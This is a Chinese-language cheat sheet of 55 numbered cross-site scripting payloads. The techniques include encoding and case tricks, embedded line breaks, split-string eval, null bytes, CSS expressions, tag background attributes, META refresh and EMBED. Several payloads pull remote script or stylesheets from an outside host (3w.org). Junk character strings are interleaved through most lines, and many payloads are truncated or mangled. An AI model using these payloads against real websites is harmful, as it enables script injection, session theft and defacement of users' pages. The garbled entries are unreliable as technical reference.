(1)普通的XSS JavaScript注入% P# T% E6 W& b# p
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% l3 m" y G9 J1 y `(99)另类弹框! ^7 R7 w6 ] [3 W" n
<q/oncut=alert()>1' \1 ~3 ]: n# _9 V8 Z B/ h
<s/onclick=alert()>b
( F% R2 @- b; Z. i. \" M <XSS=" onclick="alert(1)//">clickme</SSX=">
- Q% Z+ A2 f$ M6 b% H5 l/ e <zzz onclick=alert`1`>clickme</zzz>
1 w# G6 y1 S) {7 m <a onclick=alert`1`>clickme</a>
6 \" Z& l8 n$ t7 K) M) v: v p<a=">clickme</a=">0 k% q4 _: S- U; e5 a1 u) ~+ {
<a=">clickme</a> S: W# o7 A: ^) ^6 z, M0 ^
<z=">clickme</z=">
7 ^" R' Q+ P+ i& L<z onclick=alert`1`>clickme</z>& E) Z( Q; S* d, s* p
5 n/ l, l- ~# Y(2)IMG标签XSS使用JavaScript命令
+ e3 A4 C8 }6 ~' e5 B* O3 i8 |<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& {" H& G$ P5 z& A( O
) c7 U0 G' d0 y& C. f. z* J, u' J(3)IMG标签无分号无引号$ P7 W$ t8 M9 R/ O) q( i+ [
<IMG SRC=javascript:alert(‘XSS’)>7 W. F/ z, s" `7 X7 M. p9 b
8 p9 o! j, X; Q& N( p6 O+ S2 \
(4)IMG标签大小写不敏感. z4 O" u+ z+ S" j2 N' k" S! r
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>$ j+ e( e [3 W. F* ^
- P- N) K( L. X( ~
(5)HTML编码(必须有分号)
6 R" e& W- ?* p- A" ~$ _. p3 z6 k<IMG SRC=javascript:alert(“XSS”)>
4 p, J8 R4 o, p$ ]# t- \5 h- u- H% e/ i
(6)修正缺陷IMG标签8 t# |; S$ ?. A& t6 @! H- O
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>( g: Q7 I# d! A7 P% a: \
$ _# j8 I8 U, W8 Q8 b3 g# P6 ~
(7)formCharCode标签(计算器)
- `* t6 C& _9 m- a<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
' H" ^, e% {1 x: R
1 Z/ ]! Q( K6 r. `2 d(8)UTF-8的Unicode编码(计算器)! G) L* ]2 A+ l6 A; o
<IMG SRC=jav..省略..S')>
$ E0 y0 ~( c' x: o3 S
$ @ w) }, T7 f3 H) [(9)7位的UTF-8的Unicode编码是没有分号的(计算器)7 [1 l x7 s+ W! M4 C
<IMG SRC=jav..省略..S')>
( a! g( x0 ], y6 _$ H% N$ r5 [) \) [. E G ^
(10)十六进制编码也是没有分号(计算器)- A/ L2 |. `4 S& r
<IMG SRC=\'#\'" /span>: E2 R# j" H! q2 T; _& h$ |
# ?) K) F8 p, }( Z
(11)嵌入式标签,将Javascript分开9 L# G2 y. U" R
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>( [3 h5 a* f& x6 _1 p
. c' |" g; y) {+ N) c3 J: h4 @7 y(12)嵌入式编码标签,将Javascript分开
$ s/ N/ @7 u! q# v4 y a; W; }<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
b( [" U' s9 ^) t- K; K% F' ]+ S9 x& ]
(13)嵌入式换行符* _, D8 u4 u9 F. ?3 S8 u: r
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
6 w* n3 ?/ U4 |. A9 T9 b+ W9 [* Q6 i0 ~( u
(14)嵌入式回车, x& M2 Q5 L! I, w3 }3 T
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
- h& |4 S$ c- I" Q8 V
* F1 [9 c( D' T! S: t% f9 ^3 G(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 ]+ E8 R& t6 F) X% h<IMG SRC=\'#\'" /span>
5 I" |' m5 F3 T% S. |: d2 r L k1 j+ R% ^$ C0 Z
(16)解决限制字符(要求同页面) @9 [* v1 k" {5 D3 ]
<script>z=’document.’</script>2 O# M( e0 I; C, K
<script>z=z+’write(“‘</script>
* G' M7 J& j& W+ B7 w8 |- m! I/ P<script>z=z+’<script’</script> k g% R, H% i' T: _, W
<script>z=z+’ src=ht’</script>
- A+ R& z. P* W$ I# @( Y- F<script>z=z+’tp://ww’</script>6 @4 v$ A1 U8 l" j o
<script>z=z+’w.shell’</script>
( e+ k4 ~8 u/ V, \ u8 u0 o<script>z=z+’.net/1.’</script>+ ?" \( V4 g0 x; i( m
<script>z=z+’js></sc’</script>
! [0 |% t8 B; O9 n7 c# M- M9 J% i<script>z=z+’ript>”)’</script>' O/ C% H, N1 _
<script>eval_r(z)</script>& W1 b+ ^. W, \: a) p, J
4 f! ]9 \6 u q. f1 D0 l D(17)空字符
2 X& G- b3 M$ h+ }* r& `$ i* _& pperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
3 A" I: W% N; o* J2 q0 L7 ^9 l6 b- w6 e" K6 n! l' J
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用: O/ ?% i/ }4 U9 n' ^! f
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out+ g% H6 v( T- s. o4 P; X2 d7 O# X
1 B/ y; O9 M2 Q( ^' |$ B" v
(19)Spaces和meta前的IMG标签
8 M: ? y5 _% L0 ~( \<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>
/ ?# h- T1 f4 @% ~/ f4 H0 A' I
( D. }6 M$ p8 q$ {(20)Non-alpha-non-digit XSS
/ d0 T. _8 {1 l<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>7 ^) ]+ q1 O; L) l# ?( [, L
5 H* h% {4 C: H# D" S: i9 Q
(21)Non-alpha-non-digit XSS to 2
& M `8 n, q- H8 H' {% F5 o<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)># E% F7 \0 V+ Q. {3 f* k/ v" A
( i O6 n" r. N
(22)Non-alpha-non-digit XSS to 3+ {2 o& I0 R1 t2 i+ {
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
+ S4 y% N- p) F; @% `+ T% b
3 k9 @: v9 E0 t& ~4 g) K T(23)双开括号$ H; @- h: ~. R4 i! z
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 s4 [: J7 V& ^5 a5 u, p# k/ n
& i4 Y2 q7 _: v(24)无结束脚本标记(仅火狐等浏览器)' S, p2 ]4 w5 M z8 g
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
) [: _# L3 e- d" F4 ^+ d. ?0 {1 {
(25)无结束脚本标记2
x8 |6 A& _. [2 C( r: v<SCRIPT SRC=//3w.org/XSS/xss.js>
a5 e# |8 c9 {& N$ M- Q
. p4 K2 n8 `/ V; y8 Y/ @(26)半开的HTML/JavaScript XSS
A# r" ]/ G/ d D9 M0 @9 T1 c<IMG SRC=\'#\'" /span>
2 A6 m J" P& T
; T0 y$ X! m# _# j(27)双开角括号
! z P3 d% v3 j, i: W: i<iframe src=http://3w.org/XSS.html <
- q2 Y, y; g+ z# {# s/ P3 N$ c ^6 b
(28)无单引号 双引号 分号. W+ W6 s, C; t& O
<SCRIPT>a=/XSS/
: N4 ~3 C/ P+ halert(a.source)</SCRIPT>
: \! B# X5 _. U. V8 o5 s
# ]. T/ m. {! J# o; x(29)换码过滤的JavaScript5 m7 y, _+ w9 C* y8 `
\”;alert(‘XSS’);//8 D0 m+ e: N! H7 _. I
9 S* m4 n$ ^/ o) a5 J(30)结束Title标签
/ ?9 a0 i% W! k</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>. |+ z* y) n: Z: d) V; B
/ F( V0 V9 Z6 P2 D
(31)Input Image6 n& l" A; |* S! v4 }" k
<INPUT SRC=\'#\'" /span>
! u. X6 _* z2 E) T1 ~- H4 R
8 {; \+ |9 q4 r) \* F. y- k(32)BODY Image) y+ r) o2 {! a: U( p+ X+ x4 |
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
% Y& D- a7 E& y/ m$ R1 m# D% ]9 f1 E- E4 j q* }
(33)BODY标签" X5 i5 V% x. K; F Z1 R7 o
<BODY(‘XSS’)>9 U. O+ C0 Z/ m- L
7 U Y% i. @/ N4 t/ p- D(34)IMG Dynsrc* Q- k8 U$ t$ A- v0 r
<IMG DYNSRC=\'#\'" /span>
& h" {- J' T, @! J2 \( a. e* S0 w1 J. T# n
(35)IMG Lowsrc
/ X3 {. G+ r1 B% T<IMG LOWSRC=\'#\'" /span>- S& H! X' \# n9 n; ?
& F8 o3 d Q, t, J2 F! h W(36)BGSOUND
" n% [% [* \0 b$ |<BGSOUND SRC=\'#\'" /span>
4 f) u2 u7 B* \9 C. Z4 W7 d @! T
5 C; u" Z/ O) d( M3 E3 h(37)STYLE sheet
9 T( j3 {1 G+ l" q/ m8 ]<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>7 q* b z& p5 F+ ?
0 v9 E6 b2 G8 o(38)远程样式表3 ]/ n3 D2 V! B. U5 g4 y
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
; J9 w& @( O7 c2 ]7 o0 l- B, R$ [: N. S$ x. ~: N s. F
(39)List-style-image(列表式)
1 X6 Y3 s7 c4 R' u<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
9 z3 {4 N, @2 q5 O4 b; t! \+ u5 ?! w; D' Y
(40)IMG VBscript* P, L( g% [1 H1 y1 F) l& S; |0 Q
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS3 z5 R( l+ s9 `) [# g
v q/ \( O$ x$ Q% Y(41)META链接url
+ h: O% l1 K/ M: e+ C( x' H<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>5 C4 m! q2 N1 P, b E# B" g; d) f
5 @2 l% t$ O* `" y) H$ r6 D$ O
(42)Iframe6 f3 g3 B6 A/ j* ?, y( {' |4 x
<IFRAME SRC=\'#\'" /IFRAME>4 w7 U Y4 Q0 G7 _
! [; M0 b0 L8 y. ?# Z0 O
(43)Frame& x* A7 r3 K& g$ @2 f
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>: ~ w/ p( Y1 N
8 [% C) ?2 u" A( ?(44)Table
K" R! \7 K* b/ D4 G<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
4 b3 Z! J0 c1 k8 }5 K& f
3 W6 s& w) K; f) m4 U5 M(45)TD1 P; ^# h- Q8 O; N* s8 H
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”># m$ v1 g* g/ V
! K0 x" V" j9 n(46)DIV background-image& \( G1 \% G3 j9 }
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>; n5 N9 h3 X" f1 w" z# i& I' |
+ o; _; q: a' Q2 l5 m9 h
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
8 a. n; N7 [; ?$ P e y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>9 j, S- K0 \) I# W
1 h% x9 W, A; M$ S9 Q- O* [
(48)DIV expression
$ a7 `+ e; ?1 d3 O& X<DIV STYLE=”width: expression_r(alert(‘XSS’));”>: ^, _" W: C& \7 l
, U& X, S4 q, \$ ^% j5 p% M, \
(49)STYLE属性分拆表达7 q; J. C3 B1 ~, N$ l; V1 Y. V8 d
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
5 m- }: n! }" |! B' _: \! _6 E* q/ D. w+ Q5 m; S
(50)匿名STYLE(组成:开角号和一个字母开头)
. x& i* r- e- ?<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
+ d7 S& I3 L1 N% ]9 R
- v, Z3 ~: h1 f5 i; ^; n6 [! @(51)STYLE background-image! w* k' N$ i d" |4 N$ X, k
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>9 C; k& P0 v* n& u
$ y/ c* K- G) T0 A(52)IMG STYLE方式& H) [/ e8 x: [+ h7 C" x
exppression(alert(“XSS”))’>8 ?' n2 h; u5 R$ |0 B
; |) B' S! `6 w: Z(53)STYLE background
9 {, _2 q- C& f<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
( n8 v/ p" U4 x1 J' ]/ j# e2 \: ]; @$ w% X; s, k+ l6 o
(54)BASE
3 N5 V5 w: `/ [* [2 D4 V% z$ ?<BASE HREF=”javascript:alert(‘XSS’);//”>* p- h- T" A, a: N# B
; Y5 Q- ? m( l3 g
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
) l7 i- R4 c0 s6 Z/ W# q% V* f9 _3 B2 X<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
6 C) b0 B# ^8 R0 [; w5 P; [ |